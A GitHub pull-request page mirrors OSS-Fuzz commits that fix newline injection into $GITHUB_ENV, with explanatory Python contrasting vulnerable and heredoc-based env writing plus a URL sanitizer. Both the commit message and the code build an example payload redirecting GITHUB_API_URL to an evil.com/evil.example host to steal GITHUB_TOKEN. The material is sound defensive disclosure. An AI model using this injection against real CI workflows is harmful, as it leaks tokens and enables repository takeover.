
[pull] master from google:master #33

Merged
pull[bot] merged 3 commits into threatcode:master from google:master
Apr 2, 2026

Conversation


@pull pull Bot commented Apr 2, 2026

See Commits and Changes for more details.


Created by pull[bot] (v2.0.0-alpha.4)

Can you help keep this open source service alive? 💖 Please sponsor : )

DavidKorczynski and others added 3 commits April 2, 2026 12:32
Signed-off-by: David Korczynski <david@adalogics.com>
Signed-off-by: David Korczynski <david@adalogics.com>
An attacker can inject arbitrary env vars into the PR helper workflow by
embedding newlines in `main_repo` (e.g.
`"https://repo\nGITHUB_API_URL=https://evil.com"`). This exfiltrates
`GITHUB_TOKEN` with `pull-requests: write` scope.

- `save_env()`: switch to delimiter-based format (`NAME<<UUID`)
structurally immune to injection
- `_sanitize_repo_url()`: strip control chars + validate scheme via
`urlparse`

New tests in `pr_helper_test.py` covering injection scenarios and URL
format regression.

b/483022611
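The two mitigations the commit message describes, reconstructed as an added example that is not the project's `pr_helper.py` code. The function names `save_env_vulnerable`, `save_env_hardened`, `sanitize_repo_url`, `is_accepted_repo_url` and `injected_names` are illustrative; `parse_github_env` is a simplified emulation (an assumption, not the runner's source) of the documented `$GITHUB_ENV` formats `NAME=VALUE` and `NAME<<DELIM ... DELIM`; the `main_repo` value is constructed to carry the newline injection from the commit message.

```python
"""$GITHUB_ENV newline injection and the two mitigations from the commit
message, reconstructed for illustration (not the project's own code)."""
import re
import uuid
from urllib.parse import urlparse

# Constructed attacker-controlled `main_repo` value: the embedded newline is
# meant to become a second `NAME=VALUE` line in $GITHUB_ENV.
MALICIOUS_REPO = (
    "https://github.com/google/oss-fuzz\n"
    "GITHUB_API_URL=https://evil.example"
)

_ENV_NAME = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")
_CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def save_env_vulnerable(name: str, value: str) -> str:
    """Old single-line form. Any newline in `value` starts a new line that
    the runner reads as a separate assignment."""
    return f"{name}={value}\n"


def save_env_hardened(name: str, value: str) -> str:
    """Heredoc form `NAME<<DELIM ... DELIM`. The delimiter is a fresh random
    token, so a value cannot close the block early and append assignments."""
    if not _ENV_NAME.fullmatch(name):
        raise ValueError(f"invalid env var name: {name!r}")
    delim = f"ghadelim_{uuid.uuid4().hex}"
    if delim in value:  # practically impossible, but the check is free
        raise ValueError("value contains the heredoc delimiter")
    return f"{name}<<{delim}\n{value}\n{delim}\n"


def sanitize_repo_url(url: str) -> str:
    """Strip ASCII control characters (including \\n and \\r) and require an
    http(s) URL with a host, as the commit describes for `_sanitize_repo_url`
    (hypothetical reimplementation)."""
    cleaned = _CONTROL_CHARS.sub("", url)
    parsed = urlparse(cleaned)
    if parsed.scheme not in ("http", "https") or not parsed.netloc:
        raise ValueError(f"unsupported repository URL: {cleaned!r}")
    return cleaned


def is_accepted_repo_url(url: str) -> bool:
    """True if `sanitize_repo_url` accepts the URL, False if it rejects it."""
    try:
        sanitize_repo_url(url)
    except ValueError:
        return False
    return True


def parse_github_env(contents: str) -> dict:
    """Simplified emulation (assumption) of how the Actions runner reads
    $GITHUB_ENV: `NAME=VALUE` per line, or `NAME<<DELIM` followed by the
    value lines and a line holding only DELIM."""
    env = {}
    lines = contents.split("\n")
    i = 0
    while i < len(lines):
        line = lines[i]
        i += 1
        if not line:
            continue
        heredoc = re.fullmatch(r"([^=<]+)<<(.+)", line)
        if heredoc:
            name, delim = heredoc.groups()
            body = []
            while i < len(lines) and lines[i] != delim:
                body.append(lines[i])
                i += 1
            if i == len(lines):
                raise ValueError(f"unterminated heredoc for {name}")
            i += 1  # consume the closing delimiter line
            env[name] = "\n".join(body)
            continue
        name, sep, value = line.partition("=")
        if not sep:
            raise ValueError(f"malformed line: {line!r}")
        env[name] = value
    return env


def injected_names(save_env, value: str = MALICIOUS_REPO) -> set:
    """Variable names that land in the env besides MAIN_REPO itself."""
    env = parse_github_env(save_env("MAIN_REPO", value))
    return set(env) - {"MAIN_REPO"}


if __name__ == "__main__":
    print("vulnerable format injects:", injected_names(save_env_vulnerable))
    print("hardened format injects:  ", injected_names(save_env_hardened))
    print("sanitized URL:", repr(sanitize_repo_url(MALICIOUS_REPO)))
```

The heredoc format is the structural fix: with it the whole attacker string, newline included, becomes the value of `MAIN_REPO` and no second variable appears. The URL sanitizer is defence in depth; note that stripping (rather than rejecting) control characters silently glues the two halves of the payload into one odd-looking path, so a stricter policy would reject any input containing them.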
@pull pull Bot locked and limited conversation to collaborators Apr 2, 2026
@pull pull Bot added the ⤵️ pull label Apr 2, 2026
@pull pull Bot merged commit ec12d23 into threatcode:master Apr 2, 2026